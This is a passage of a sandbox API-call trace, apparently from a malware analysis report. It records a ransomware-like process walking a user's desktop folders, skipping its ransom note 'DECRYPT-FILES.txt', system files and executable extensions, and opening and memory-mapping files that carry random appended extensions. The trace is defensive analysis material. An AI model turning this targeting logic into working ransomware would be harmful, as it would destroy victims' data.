9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xf0d38a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d38a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0184.751] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.751] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xf0d38a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d38a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.751] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.751] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0d38a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0d38a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0d38a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.751] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.751] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.751] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.751] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.751] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.751] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.751] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.751] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\0a16c9.tmp" [0184.752] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.752] CloseHandle (hObject=0x0) returned 0 [0184.752] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.752] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd32440, ftCreationTime.dwHighDateTime=0x1d4c79a, ftLastAccessTime.dwLowDateTime=0x89af5470, ftLastAccessTime.dwHighDateTime=0x1d4c868, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10ab7, dwReserved0=0x0, dwReserved1=0x0, cFileName="b8eivm.m4a.lNDZB", cAlternateFileName="B8EIVM~1.LND")) returned 1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="DECRYPT-FILES.txt") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="autorun.inf") returned 1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="boot.ini") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="desktop.ini") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="ntuser.dat") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="iconcache.db") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="bootsect.bak") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="ntuser.dat.log") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="thumbs.db") returned -1 [0184.752] lstrcmpiW (lpString1="b8eivm.m4a.lNDZB", lpString2="Bootfont.bin") returned -1 [0184.752] lstrlenW (lpString="b8eivm.m4a.lNDZB") returned 16 [0184.752] lstrcmpiW (lpString1="lNDZB", lpString2="lnk") returned -1 [0184.752] lstrcmpiW (lpString1="lNDZB", lpString2="exe") returned 1 [0184.752] lstrcmpiW (lpString1="lNDZB", lpString2="sys") returned -1 [0184.753] lstrcmpiW (lpString1="lNDZB", lpString2="dll") returned 1 [0184.753] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.753] lstrlenW (lpString="b8eivm.m4a.lNDZB") returned 16 [0184.753] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.753] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="b8eivm.m4a.lNDZB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a.lNDZB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a.lNDZB" [0184.753] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a.lNDZB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\b8eivm.m4a.lndzb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0184.753] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=68279) returned 1 [0184.753] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0184.753] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.754] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.754] CloseHandle (hObject=0x278) returned 1 [0184.754] CloseHandle (hObject=0x274) returned 1 [0184.754] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.754] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcbb0a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadcbb0a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.754] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.754] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ef0f70, ftCreationTime.dwHighDateTime=0x1d4d56a, ftLastAccessTime.dwLowDateTime=0x2ee2cdd0, ftLastAccessTime.dwHighDateTime=0x1d4c794, ftLastWriteTime.dwLowDateTime=0xadce1200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="NDz9b2iJqzck3z259N.wav.oHLiVj", cAlternateFileName="NDZ9B2~1.OHL")) returned 1 [0184.754] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="DECRYPT-FILES.txt") returned 1 [0184.754] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="autorun.inf") returned 1 [0184.754] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="boot.ini") returned 1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="desktop.ini") returned 1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="ntuser.dat") returned -1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="iconcache.db") returned 1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="bootsect.bak") returned 1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="ntuser.dat.log") returned -1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="thumbs.db") returned -1 [0184.755] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav.oHLiVj", lpString2="Bootfont.bin") returned 1 [0184.755] lstrlenW (lpString="NDz9b2iJqzck3z259N.wav.oHLiVj") returned 29 [0184.755] lstrcmpiW (lpString1="oHLiVj", lpString2="lnk") returned 1 [0184.755] lstrcmpiW (lpString1="oHLiVj", lpString2="exe") returned 1 [0184.755] lstrcmpiW (lpString1="oHLiVj", lpString2="sys") returned -1 [0184.755] lstrcmpiW (lpString1="oHLiVj", lpString2="dll") returned 1 [0184.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.755] lstrlenW (lpString="NDz9b2iJqzck3z259N.wav.oHLiVj") returned 29 [0184.755] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="NDz9b2iJqzck3z259N.wav.oHLiVj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav.oHLiVj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav.oHLiVj" [0184.755] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav.oHLiVj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\ndz9b2ijqzck3z259n.wav.ohlivj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0184.755] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=32616) returned 1 [0184.755] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0184.756] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.756] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.756] CloseHandle (hObject=0x278) returned 1 [0184.756] CloseHandle (hObject=0x274) returned 1 [0184.756] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.757] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97c2500, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0xb4da8a10, ftLastAccessTime.dwHighDateTime=0x1d4cc2e, ftLastWriteTime.dwLowDateTime=0xadd2d4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4324, dwReserved0=0x0, dwReserved1=0x0, cFileName="skBGg8NuGv.pptx.a9ThA7o", cAlternateFileName="SKBGG8~1.A9T")) returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="DECRYPT-FILES.txt") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="autorun.inf") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="boot.ini") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="desktop.ini") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="ntuser.dat") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="iconcache.db") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="bootsect.bak") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="ntuser.dat.log") returned 1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="thumbs.db") returned -1 [0184.757] lstrcmpiW (lpString1="skBGg8NuGv.pptx.a9ThA7o", lpString2="Bootfont.bin") returned 1 [0184.757] lstrlenW (lpString="skBGg8NuGv.pptx.a9ThA7o") returned 23 [0184.757] lstrcmpiW (lpString1="a9ThA7o", lpString2="lnk") returned -1 [0184.757] lstrcmpiW (lpString1="a9ThA7o", lpString2="exe") returned -1 [0184.757] lstrcmpiW (lpString1="a9ThA7o", lpString2="sys") returned -1 [0184.757] lstrcmpiW (lpString1="a9ThA7o", lpString2="dll") returned -1 [0184.757] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.757] lstrlenW (lpString="skBGg8NuGv.pptx.a9ThA7o") returned 23 [0184.757] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="skBGg8NuGv.pptx.a9ThA7o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx.a9ThA7o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx.a9ThA7o" [0184.757] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx.a9ThA7o" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\skbgg8nugv.pptx.a9tha7o"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0184.758] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=17188) returned 1 [0184.758] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0184.758] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.758] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.759] CloseHandle (hObject=0x278) returned 1 [0184.759] CloseHandle (hObject=0x274) returned 1 [0184.759] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.759] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419c4550, ftCreationTime.dwHighDateTime=0x1d4c546, ftLastAccessTime.dwLowDateTime=0x90cd45d0, ftLastAccessTime.dwHighDateTime=0x1d4c667, ftLastWriteTime.dwLowDateTime=0xadd53620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xabed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sy-Ep.mkv.b8sT", cAlternateFileName="SY-EPM~1.B8S")) returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="DECRYPT-FILES.txt") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="autorun.inf") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="boot.ini") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="desktop.ini") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="ntuser.dat") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="iconcache.db") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="bootsect.bak") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="ntuser.dat.log") returned 1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="thumbs.db") returned -1 [0184.759] lstrcmpiW (lpString1="Sy-Ep.mkv.b8sT", lpString2="Bootfont.bin") returned 1 [0184.759] lstrlenW (lpString="Sy-Ep.mkv.b8sT") returned 14 [0184.759] lstrcmpiW (lpString1="b8sT", lpString2="lnk") returned -1 [0184.759] lstrcmpiW (lpString1="b8sT", lpString2="exe") returned -1 [0184.759] lstrcmpiW (lpString1="b8sT", lpString2="sys") returned -1 [0184.759] lstrcmpiW (lpString1="b8sT", lpString2="dll") returned -1 [0184.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0184.759] lstrlenW (lpString="Sy-Ep.mkv.b8sT") returned 14 [0184.759] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0184.759] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="Sy-Ep.mkv.b8sT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv.b8sT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv.b8sT" [0184.759] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv.b8sT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\sy-ep.mkv.b8st"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0184.760] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=44013) returned 1 [0184.760] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0184.760] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.761] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.761] CloseHandle (hObject=0x278) returned 1 [0184.761] CloseHandle (hObject=0x274) returned 1 [0184.761] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.761] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419c4550, ftCreationTime.dwHighDateTime=0x1d4c546, ftLastAccessTime.dwLowDateTime=0x90cd45d0, ftLastAccessTime.dwHighDateTime=0x1d4c667, ftLastWriteTime.dwLowDateTime=0xadd53620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xabed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sy-Ep.mkv.b8sT", cAlternateFileName="SY-EPM~1.B8S")) returned 0 [0184.761] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0184.761] CloseHandle (hObject=0x26c) returned 1 [0184.762] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xadd79780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadd79780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wMOo1ftKNq\\", cAlternateFileName="WMOO1F~1")) returned 0 [0184.762] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0184.762] CloseHandle (hObject=0x264) returned 1 [0184.762] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2c2fc0, ftCreationTime.dwHighDateTime=0x1d4d013, ftLastAccessTime.dwLowDateTime=0x917915f0, ftLastAccessTime.dwHighDateTime=0x1d4d33b, ftLastWriteTime.dwLowDateTime=0xadd9f8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", cAlternateFileName="T48Y4D~1.MJT")) returned 1 [0184.762] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="DECRYPT-FILES.txt") returned 1 [0184.762] lstrcmpiW 